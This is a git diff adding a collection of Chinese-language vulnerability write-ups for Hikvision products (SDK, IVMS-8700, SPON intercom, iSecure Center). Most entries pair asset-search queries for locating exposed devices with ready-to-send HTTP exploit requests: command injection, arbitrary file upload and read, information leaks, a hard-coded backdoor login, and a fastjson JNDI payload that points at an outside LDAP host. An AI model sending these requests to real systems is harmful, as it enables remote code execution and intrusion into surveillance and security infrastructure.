+![1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673.png](./img/BRUyZKZO0-k6Y5uv/1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673-137663.png) + +# 四、漏洞复现 +1. 执行命令,写入到文件中 + +```plain +PUT /SDK/webLanguage HTTP/1.1 +User-Agent: python-requests/2.31.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: xx.xx.xx.xx +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Language: en-US,en;q=0.9,sv;q=0.8 +Content-Length: 79 + +$(ifconfig>webLib/x) +``` + +![1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5.png](./img/BRUyZKZO0-k6Y5uv/1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5-028165.png) + +2. 
获取命令执行结果 + +```plain +GET /x HTTP/1.1 +User-Agent: python-requests/2.31.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: xx.xx.xx.xx +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Language: en-US,en;q=0.9,sv;q=0.8 +``` + +![1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437.png](./img/BRUyZKZO0-k6Y5uv/1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437-357466.png) + +利用脚本 + +[HIKVISION_CVE-2021-36260_rce.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222237457-6ffbdfa8-06b2-47c4-b0a5-0576e9fd5cda.py) + +```plain +python HIKVISION_CVE-2021-36260_rce.py --rhost xx.xx.xx.xx --rport 8098 --cmd "ls -al" +``` + +![1700232671938-598342d8-9715-45cc-8ecf-477e359015aa.png](./img/BRUyZKZO0-k6Y5uv/1700232671938-598342d8-9715-45cc-8ecf-477e359015aa-640350.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视IVMS-8700-fastjson命令执行漏洞.md b/海康威视IVMS-8700-fastjson命令执行漏洞.md new file mode 100644 index 0000000..354efed --- /dev/null +++ b/海康威视IVMS-8700-fastjson命令执行漏洞.md @@ -0,0 +1,17 @@ +## 海康威视IVMS-8700 fastjson命令执行漏洞 + +``` +POST /bic/ssoService/v1/applyCT HTTP/1.1 +Host: 127.0.0.1 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: cross-site +Sec-Fetch-User: ?1 +Te: trailers +Content-Type: application/json +Content-Length: 204 + +{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://kjvqweuoav.dnstunnel.run","autoCommit":true},"hfe4zyyzldp":"="} +``` diff --git a/海康威视SPONIP网络对讲广播系统addscenedata存在任意文件上传漏洞.md b/海康威视SPONIP网络对讲广播系统addscenedata存在任意文件上传漏洞.md new file mode 100644 index 0000000..7b24dac --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统addscenedata存在任意文件上传漏洞.md 
@@ -0,0 +1,46 @@ +# 海康威视SPON IP网络对讲广播系统addscenedata存在任意文件上传漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统addscenedata存在任意文件上传漏洞,恶意攻击者可能会上传恶意的后门文件,使服务器失陷。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/0NNFrB2N2TFVw-Ep/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-210262.png) + +# 四、漏洞复现 +```java +POST /php/addscenedata.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Connection: close +Content-Length: 218 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ +Accept-Encoding: gzip + +------WebKitFormBoundary4LuoBRpTiVBo9cIQ +Content-Disposition: form-data; name="upload"; filename="tt.php" +Content-Type: text/plain + +123 +------WebKitFormBoundary4LuoBRpTiVBo9cIQ-- +``` + +![1704857585745-e3b20507-4f5a-4331-a42b-b30b4fa09640.png](./img/0NNFrB2N2TFVw-Ep/1704857585745-e3b20507-4f5a-4331-a42b-b30b4fa09640-505659.png) + +上传文件位置 + +```java +/images/scene/tt.php +``` + +![1704857616251-0aa885ce-2985-4d09-8ed3-a968ca4a8fac.png](./img/0NNFrB2N2TFVw-Ep/1704857616251-0aa885ce-2985-4d09-8ed3-a968ca4a8fac-207072.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞.md b/海康威视SPONIP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞.md new file mode 100644 index 0000000..760269d --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞.md 
@@ -0,0 +1,50 @@ +# 海康威视SPON IP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞,恶意攻击者可能会上传恶意的后门文件,使服务器失陷。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/eEgA4wXoVftviTL4/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-059681.png) + +# 四、漏洞复现 +```plain +POST /php/busyscreenshotpush.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 +Content-Length: 181 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 + +jsondata[caller]=1&jsondata[callee]=1&jsondata[imagename]=..\..\..\Wnmp\WWW\upload\1_0_xjayuiwqzj.php&jsondata[imagecontent]=PD9waHAgZWNobyAxMTEqMTExOyB1bmxpbmsoX19GSUxFX18pOyA/Pg== +``` + +![1706074591038-de25acd2-2194-4a9f-aaf3-e39839d43b07.png](./img/eEgA4wXoVftviTL4/1706074591038-de25acd2-2194-4a9f-aaf3-e39839d43b07-196152.png) + +上传文件位置 + +```plain +GET /upload/1_0_xjayuiwqzj.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1706074625976-5f0afac2-b803-4816-a5f8-1332bc07b28a.png](./img/eEgA4wXoVftviTL4/1706074625976-5f0afac2-b803-4816-a5f8-1332bc07b28a-044143.png) + +[spon-网络对讲-busyscreenshotpush-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222236974-3b0a8a41-ca74-4d04-8da4-26985556355d.yaml) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file 
diff --git a/海康威视SPONIP网络对讲广播系统exportrecord存在任意文件读取漏洞.md b/海康威视SPONIP网络对讲广播系统exportrecord存在任意文件读取漏洞.md new file mode 100644 index 0000000..81acaf8 --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统exportrecord存在任意文件读取漏洞.md @@ -0,0 +1,32 @@ +# 海康威视SPON IP网络对讲广播系统exportrecord存在任意文件读取漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统exportrecord存在任意文件读取漏洞。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/Yd53WVvuLyYlHyQc/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-424515.png) + +# 四、漏洞复现 +```java +GET /php/exportrecord.php?downtype=10&downname=C:\\Windows\\win.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1704870941456-ccd140a6-371b-419f-b1a9-f0bd3dfee005.png](./img/Yd53WVvuLyYlHyQc/1704870941456-ccd140a6-371b-419f-b1a9-f0bd3dfee005-744555.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统getjson存在任意文件读取漏洞.md b/海康威视SPONIP网络对讲广播系统getjson存在任意文件读取漏洞.md new file mode 100644 index 0000000..cf13c9a --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统getjson存在任意文件读取漏洞.md 
@@ -0,0 +1,37 @@ +# 海康威视SPON IP网络对讲广播系统getjson存在任意文件读取漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统getjson存在任意文件读取漏洞。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/0U2NLRBKAT56CH1C/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-116718.png) + +# 四、漏洞复现 +```java +POST /php/getjson.php HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 44 + +jsondata[filename]=./ocx.json +``` + +![1704944421700-582b17ab-4acb-41dc-b15d-ecb1594c9772.png](./img/0U2NLRBKAT56CH1C/1704944421700-582b17ab-4acb-41dc-b15d-ecb1594c9772-780698.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统getuserdata存在信息泄露漏洞.md b/海康威视SPONIP网络对讲广播系统getuserdata存在信息泄露漏洞.md new file mode 100644 index 0000000..1a2aaf0 --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统getuserdata存在信息泄露漏洞.md 
@@ -0,0 +1,37 @@ +# 海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露漏洞,攻击者可通过该漏洞在服务器端读取账户密码,从而登录后台。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/wypAhO4pJ8vtvSv5/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-817066.png) + +# 四、漏洞复现 +```java +POST /php/getuserdata.php HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 44 + +jsondata[pageIndex]=0&jsondata[pageCount]=30 +``` + +![1704936814754-a5e79495-da6d-46f1-a20e-6e0045c4f7af.png](./img/wypAhO4pJ8vtvSv5/1704936814754-a5e79495-da6d-46f1-a20e-6e0045c4f7af-132521.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统index存在信息泄露漏洞.md b/海康威视SPONIP网络对讲广播系统index存在信息泄露漏洞.md new file mode 100644 index 0000000..baf4b3a --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统index存在信息泄露漏洞.md 
@@ -0,0 +1,34 @@ +# 海康威视SPON IP网络对讲广播系统index存在信息泄露漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统index存在信息泄露漏洞,攻击者可通过该漏洞在服务器端读取账户密码,从而登录后台。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/ZQoNFDtBj3VElRjU/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-912720.png) + +# 四、漏洞复现 +```java +GET /js/index.js?t=0.1 HTTP/1.1 +Host: +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Accept-Encoding: gzip, deflate, br +Connection: close +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1704944865462-8df9d69d-9782-4600-a55a-b0e4d4aac452.png](./img/ZQoNFDtBj3VElRjU/1704944865462-8df9d69d-9782-4600-a55a-b0e4d4aac452-356579.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统my_parser存在任意文件上传漏洞.md b/海康威视SPONIP网络对讲广播系统my_parser存在任意文件上传漏洞.md new file mode 100644 index 0000000..3237ab7 --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统my_parser存在任意文件上传漏洞.md 
@@ -0,0 +1,53 @@ +# 海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传漏洞,恶意攻击者可能会上传恶意的后门文件,使服务器失陷。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/eeomSk6Be4UoNr4r/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-443930.png) + +# 四、漏洞复现 +```java +/upload/upload.html +``` + +![1704857171496-32b9c84a-3439-4941-90e7-dc4b2f2264e6.png](./img/eeomSk6Be4UoNr4r/1704857171496-32b9c84a-3439-4941-90e7-dc4b2f2264e6-022312.png) + +```java +POST /upload/my_parser.php HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8dsf2vRYZDVPaW9m +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Length: 139243 + +------WebKitFormBoundary8dsf2vRYZDVPaW9m +Content-Disposition: form-data; name="upload"; filename="tt.php" +Content-Type: image/jpeg + +1111111 +------WebKitFormBoundary8dsf2vRYZDVPaW9m-- +``` + +![1704857288482-ca32fb5c-937a-4ecf-b86c-91a298e5a38a.png](./img/eeomSk6Be4UoNr4r/1704857288482-ca32fb5c-937a-4ecf-b86c-91a298e5a38a-336677.png) + +上传文件位置 + +```java +/upload/files/tt.php +``` + +![1704857320066-c828b2fe-fc1c-4f32-a9b1-3ae9e5d73100.png](./img/eeomSk6Be4UoNr4r/1704857320066-c828b2fe-fc1c-4f32-a9b1-3ae9e5d73100-761362.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统rj_get_token存在任意文件读取漏洞.md b/海康威视SPONIP网络对讲广播系统rj_get_token存在任意文件读取漏洞.md new file mode 100644 index 0000000..f81fe75 --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统rj_get_token存在任意文件读取漏洞.md 
@@ -0,0 +1,42 @@ +# 海康威视SPON IP网络对讲广播系统rj_get_token存在任意文件读取漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统getjson存在任意文件读取漏洞。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/gQEXNUCoyilRb96r/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-931102.png) + +# 四、漏洞复现 +```plain +POST /php/rj_get_token.php HTTP/1.1 +Host: +Content-Length: 120 +Sec-Ch-Ua: +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 +Sec-Ch-Ua-Platform: "" +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +jsondata[url]=rj_get_token.php +``` + +![1705237594033-ec2aca8a-b9a8-4417-86e2-fae5df5aaeec.png](./img/gQEXNUCoyilRb96r/1705237594033-ec2aca8a-b9a8-4417-86e2-fae5df5aaeec-314646.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统uploadjson存在任意文件上传漏洞.md b/海康威视SPONIP网络对讲广播系统uploadjson存在任意文件上传漏洞.md new file mode 100644 index 0000000..68e444c --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统uploadjson存在任意文件上传漏洞.md 
@@ -0,0 +1,44 @@ +# 海康威视SPON IP网络对讲广播系统uploadjson存在任意文件上传漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统my_parser存在任意文件上传漏洞,恶意攻击者可能会上传恶意的后门文件,使服务器失陷。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/09hL4VLsS-pV3aEb/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-455066.png) + +# 四、漏洞复现 +```java +POST /php/uploadjson.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 60 + +jsondata[filename]=111.php&jsondata[data]= +``` + +![1704870723907-3a79bc40-1174-49ae-86cc-f54a7fc7d35a.png](./img/09hL4VLsS-pV3aEb/1704870723907-3a79bc40-1174-49ae-86cc-f54a7fc7d35a-772590.png) + +上传文件位置 + +```java +/lan/111.php +``` + +![1704870773380-20e41fa5-0e94-4700-a7e1-9e7a2cbca2e3.png](./img/09hL4VLsS-pV3aEb/1704870773380-20e41fa5-0e94-4700-a7e1-9e7a2cbca2e3-143365.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统存在后门账号漏洞.md b/海康威视SPONIP网络对讲广播系统存在后门账号漏洞.md new file mode 100644 index 0000000..a60ec7a --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统存在后门账号漏洞.md 
@@ -0,0 +1,30 @@ +# 海康威视SPON IP网络对讲广播系统存在后门账号漏洞 + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统存在后门账号漏洞。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ Hunter:`web.body="vendors/custom/html5.min.js"` ++ 特征 + +![1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b.png](./img/rr6KagZV-W624Z1G/1704857140903-8dadddb1-8d90-42a6-9179-3cd4dca00c8b-592211.png) + +# 四、漏洞复现 +后门账号在代码中写死的 + +```java +后门账号: +administrator/800823 +``` + +![1704871100509-de3f1070-d8a7-4e6d-a1c0-1b9219a4e64a.png](./img/rr6KagZV-W624Z1G/1704871100509-de3f1070-d8a7-4e6d-a1c0-1b9219a4e64a-580031.png) + +![1704871179647-001e8c87-cbe9-4899-8f1a-ff82ee3a1bff.png](./img/rr6KagZV-W624Z1G/1704871179647-001e8c87-cbe9-4899-8f1a-ff82ee3a1bff-773611.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file diff --git a/海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md b/海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md new file mode 100644 index 0000000..2559c47 --- /dev/null +++ b/海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md 
@@ -0,0 +1,49 @@ +# 海康威视SPON IP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895) + +# 一、漏洞简介 +Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。 + +# 二、影响版本 ++ 海康威视SPON IP网络对讲广播系统 + +# 三、资产测绘 ++ fofa`icon_hash="-1830859634"` ++ 特征 + +![1703683596082-c644fff9-438a-460f-891f-450ad725c4bd.png](./img/zkv4X8uRv86yGSaP/1703683596082-c644fff9-438a-460f-891f-450ad725c4bd-280274.png) + +# 四、漏洞复现 +```plain +POST /php/ping.php HTTP/1.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: {hostname} +Content-Length: 40 +Content-Type: application/x-www-form-urlencoded + +jsondata[ip]=a|echo stc&jsondata[type]=1 +``` + +![1703683644604-a5807506-f785-435a-b533-2746677fe24b.png](./img/zkv4X8uRv86yGSaP/1703683644604-a5807506-f785-435a-b533-2746677fe24b-391178.png) + +```plain +POST /php/ping.php HTTP/1.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: {hostname} +Content-Length: 40 +Content-Type: application/x-www-form-urlencoded + +jsondata[ip]=a|whoami&jsondata[type]=1 +``` + +![1703683677233-dde83799-2b24-4b7b-984b-0429def16e4a.png](./img/zkv4X8uRv86yGSaP/1703683677233-dde83799-2b24-4b7b-984b-0429def16e4a-426020.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台center任意文件上传漏洞.md b/海康威视iSecureCenter综合安防管理平台center任意文件上传漏洞.md new file mode 100644 index 0000000..b55be10 --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台center任意文件上传漏洞.md 
@@ -0,0 +1,76 @@ +# 海康威视iSecure Center综合安防管理平台center任意文件上传漏洞 + +# 1、漏洞描述 +HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞 + +# 2、影响版本 +HIKVISION iSecure Center综合安防管理平台 + +![1691858081036-d871cda5-31d1-4693-a77d-41c0bb876b49.png](./img/QD4KsFbI2-Z4evtl/1691858081036-d871cda5-31d1-4693-a77d-41c0bb876b49-481067.png) + +# 3、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +# 4、漏洞复现 +## POC1 +漏洞地址:`/center/api/files;.js` + +```java +POST /center/api/files;.js HTTP/1.1 +Host: 127.0.0.1 +User-Agent: python-requests/2.26.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Length: 257 +Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c + +--ea26cdac4990498b32d7a95ce5a5135c +Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.jsp" +Content-Type: application/octet-stream + +332299402 +--ea26cdac4990498b32d7a95ce5a5135c-- +``` + +![1691858525729-8505d3a1-1815-44de-ba94-bf36c31e5c62.png](./img/QD4KsFbI2-Z4evtl/1691858525729-8505d3a1-1815-44de-ba94-bf36c31e5c62-308053.png) + +上传后的文件位置`/clusterMgr/1.jsp;.js` + +```plain +https://xx.xx.xx.xx/clusterMgr/153107606.jsp;.js +``` + +![1691858698425-bf786d03-8a91-461c-8cbc-ea6ab174e23e.png](./img/QD4KsFbI2-Z4evtl/1691858698425-bf786d03-8a91-461c-8cbc-ea6ab174e23e-251565.png) + +## POC2 +```plain +POST /center/api/files;.html HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + +------WebKitFormBoundary9PggsiM755PLa54a +Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" +Content-Type: 
application/zip + +<%out.print("test3");%> + +------WebKitFormBoundary9PggsiM755PLa54a-- +``` + +![1691866428821-18013ca7-2c86-4b10-a27b-a8265441742c.png](./img/QD4KsFbI2-Z4evtl/1691866428821-18013ca7-2c86-4b10-a27b-a8265441742c-260468.png) + +上传文件位置 + +```plain +https://xx.xx.xx.xx/portal/ui/login/..;/..;/new.jsp +``` + +![1691866500572-0f02ac1e-89f5-4396-9fc1-0c232006d77a.png](./img/QD4KsFbI2-Z4evtl/1691866500572-0f02ac1e-89f5-4396-9fc1-0c232006d77a-407509.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台config.properties信息泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台config.properties信息泄漏漏洞.md new file mode 100644 index 0000000..644b1ac --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台config.properties信息泄漏漏洞.md @@ -0,0 +1,30 @@ +# 海康威视iSecure Center综合安防管理平台 config.properties信息泄漏漏洞 + +# 一、漏洞简介 +HIKVISION 综合安防管理平台存在信息泄漏漏洞,攻击者通过漏洞可以获取等敏感信息进一步攻击。 + +# 二、影响版本 ++ HIKVISION 综合安防管理平台 + +# 三、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + 